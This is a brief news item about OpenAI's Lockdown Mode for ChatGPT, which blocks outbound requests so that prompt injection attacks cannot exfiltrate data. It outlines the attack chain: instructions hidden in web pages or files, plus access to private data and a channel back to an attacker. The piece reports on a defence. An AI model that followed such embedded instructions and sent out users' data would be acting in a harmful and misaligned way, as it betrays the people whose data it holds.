OpenAI's Lockdown Mode rolls out to prevent data theft in prompt injection attacks

OpenAI first teased Lockdown Mode in February; it is now live and rolling out to eligible personal accounts (Free, Go, Plus, and Pro) and self-serve ChatGPT Business accounts.

Lockdown Mode limits outbound network requests to prevent the final stage of data exfiltration from a prompt injection attack (a technique where malicious instructions embedded in content can alter ChatGPT's behavior). It does not prevent the injection itself from appearing in cached web content or uploaded files.

The feature addresses what the article calls the "Lethal Trifecta"—when an LLM system has access to private data, exposure to untrusted content, and a way to transmit data back to an attacker. By cutting off the exfiltration vector using deterministic mechanisms not evaluated by AI systems, Lockdown Mode attacks one leg of that attack chain.